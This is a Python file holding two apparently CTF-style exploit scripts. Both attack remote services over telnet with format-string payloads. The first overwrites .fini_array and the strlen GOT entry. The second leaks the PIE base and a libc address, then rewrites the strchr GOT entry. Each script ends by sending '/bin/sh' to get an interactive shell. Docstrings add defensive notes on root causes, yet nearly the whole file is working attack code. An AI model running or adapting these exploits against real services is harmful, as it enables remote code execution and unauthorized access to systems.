def main():
    """Drive the remote service over telnet and send one format-string payload.

    Everything in this block is network I/O in a fixed order and there is no
    return value. ``FormatStr``, ``HOST`` and ``PORT`` are defined elsewhere
    in the file; from the way ``p[addr] = [value]`` is used, ``FormatStr``
    presumably schedules a write of ``value`` at ``addr`` and ``p.payload``
    renders those writes into bytes (confirm against its definition).

    Reading notes for a defender: the two scheduled writes target the
    binary's ``.fini_array`` entry and the ``strlen`` GOT slot, i.e. tables
    that stay writable at runtime when the binary is not linked with full
    RELRO (``-Wl,-z,relro,-z,now``). The other precondition is that text the
    user supplies as a "name" reaches a printf-family format argument; either
    fix on its own removes the primitive.
    """
    # GOT overwrite
    # Fixed (non-PIE, 32-bit style) addresses taken from the target binary.
    system_plt = 0x08048490
    strlen_got = 0x08049a54
    fini_array = 0x08049934
    # NOTE(review): this local shadows the enclosing function name ``main``;
    # harmless here because the function never refers to itself, but easy to
    # misread. It is the value written into fini_array below.
    main = 0x080485ed
    # NOTE(review): unused in this block.
    ret2main = '%19$08xx'
    tn = telnetlib.Telnet(HOST, PORT)
    p = FormatStr()
    p[fini_array] = [main]
    p[strlen_got] = [system_plt]
    # The three payload() arguments are FormatStr-specific (their meaning is
    # not visible in this file); the last one is the length of the prompt
    # text the service prints before echoing the input.
    payload = p.payload(12, 2, len('Nice to meet you, '))
    payload += b'\n'
    tn.read_until(b'name... ')
    tn.write(payload)
    # Second prompt: the input is now passed to whatever the overwritten
    # strlen slot points at.
    tn.read_until(b'name... ')
    tn.write(b'/bin/sh\n')
    tn.interact()
def main():
    """Drive the remote "TARDIS" service over telnet through a leak-then-write sequence.

    The block is strictly sequential network I/O with no return value.
    ``Telnet``, ``FormatStr``, ``game``, ``HOST``, ``PORT``, ``struct`` and
    ``time`` come from elsewhere in the file. Two format-string reads
    (``%N$p`` and ``%21$s``) recover the program base and a libc pointer;
    a third format-string use writes into the ``strchr`` GOT slot.

    Reading notes for a defender: the leak step exists because the binary is
    position independent (addresses are computed as ``base_addr + offset``),
    so ASLR alone was not enough; the write step exists because the GOT is
    still writable (no full RELRO). Both steps share the same root cause —
    user-controlled text reaching a format argument — which is also the
    thing to look for when reviewing the service's source.
    """
    coordinates = '51.492137,-0.192878 '
    # Offsets inside the target's libc build and the PIE binary; they are
    # specific to the versions the author analysed.
    libc_setsockopt_offset = 0xea8e0
    libc_system_offset = 0x3af40
    libc_binsh_offset = 0x15ef08
    strchr_got_offset = 0x505c
    tn = Telnet(HOST, PORT)
    # Reconnect-and-restart loop around game() (defined elsewhere): five
    # consecutive successful rounds are required before continuing.
    # NOTE(review): the original was collapsed onto one line; the loop is
    # reconstructed as ending after ``stage = 0`` — confirm against the
    # original layout.
    stage = 0
    while stage < 5:
        try:
            game(tn)
            stage += 1
        # NOTE(review): bare ``except:`` also swallows KeyboardInterrupt and
        # SystemExit, so Ctrl-C cannot leave this loop; catching the telnet
        # I/O errors (EOFError/OSError) would be the conventional form.
        except:
            # The old connection is dropped without an explicit close().
            del(tn)
            tn = Telnet(HOST, PORT)
            stage = 0
    tn.read_until(b'TARDIS KEY: ')
    tn.write(b'UeSlhCAGEp\n')
    tn.read_until(b'Selection: ')
    tn.write(b'11111111\x00')
    print('wait for alarm')
    time.sleep(3)
    # Native-endian ``unsigned long``; the other packs in this block use the
    # explicit little-endian 32-bit form ``'<I'``.
    tn.write(struct.pack('L', 1431907181))
    tn.write(b'11111111\xff')
    tn.write(b'1\n')
    tn.read_until(b'Selection: ')
    tn.write(b'3\n')
    tn.read_until(b'Coordinates: ')
    tn.write(coordinates.encode())
    # Positional-argument index for ``%N$p``: the difference of two stack
    # addresses in 4-byte words, minus one (evaluates to 275).
    tn.write('zzz%{}$p\n'.format(int((0xff8ce05c-0xff8cdc0c)/4-1)).encode())
    tn.read_until(b'zzz')
    # Ten characters is ``0x`` plus eight hex digits, i.e. one 32-bit
    # pointer; subtracting a fixed offset yields the program's load base.
    base_addr = int(tn.read_some()[0:10].decode(), 16) - 0x1491
    print('base addr : {}'.format(hex(base_addr)))
    tn.read_until(b'Coordinates: ')
    tn.write(coordinates.encode())
    # ``%21$s`` dereferences the address placed just after the ``zzzz``
    # marker; base_addr+0x500c is presumably the setsockopt GOT entry (the
    # name of the result suggests so — confirm).
    tn.write(b'zzzz')
    tn.write(struct.pack('<I', base_addr+0x500c))
    tn.write(b'%21$s\n')
    tn.read_until(b'zzzz')
    setsockopt_addr = struct.unpack('<I', tn.read_some()[4:8])[0]
    print('setsockopt :{}'.format(hex(setsockopt_addr)))
    # Rebase from the leaked libc pointer using the known intra-libc offsets.
    libc_system = setsockopt_addr - (libc_setsockopt_offset - libc_system_offset)
    # NOTE(review): computed but never used in this block.
    libc_binsh = setsockopt_addr - (libc_setsockopt_offset - libc_binsh_offset)
    print('system :{}'.format(hex(libc_system)))
    strchr_got = base_addr + strchr_got_offset
    print('strchr_got :{}'.format(hex(strchr_got)))
    p = FormatStr()
    # The two subtracted constants are FormatStr/target specific and cannot
    # be derived from this file.
    p[strchr_got] = libc_system - 0x14 - 0x140000
    tn.write(coordinates.encode())
    tn.write(p.payload(20) + b'\n')
    tn.read_until(b'Coordinates: ')
    tn.read_until(b'Coordinates: ')
    tn.write(b'/bin/sh\n')
    tn.interact()